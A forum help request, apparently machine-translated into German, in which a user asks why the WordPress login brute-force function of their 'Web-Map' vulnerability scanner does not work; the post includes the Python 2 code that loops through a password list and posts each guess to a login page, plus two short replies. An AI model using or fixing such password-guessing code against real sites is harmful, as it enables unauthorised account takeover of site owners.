Ich habe ein Programm namens Web-Map gemacht. es scannt eine Website nach Sicherheitslücken. Aber ich habe einige Probleme mit Brute-Forcing der Wordpress-Login. Dies ist der Code, der Brute-Force das Login:Wie logge ich mich bei WORDPRESS mit Python mit Anfragen ein?
def brute_login(tgt, dictionary):
s = requests.Session()
pass_found = False
user = raw_input("User: ")
intent = 0
tgt = tgt+"/wp-login"
f = open(dictionary, 'r')
for word in f.readlines():
password = word.strip('\n')
intent+=1
payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}
print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent)
s.post(tgt, data=payload)
data = s.get("http://gerion.info/wp-admin").text
if 'Escritorio' in data or 'Desktop' in data:
print '[*] Password found: '+password
pass_found = True
else:
pass
Ich hoffe, dass Sie mir helfen können, Dank !!
würde ich die * Authentifizierung * und * Login * Tags auf diese Frage –
Was nicht funktioniert hinzufügen? – payne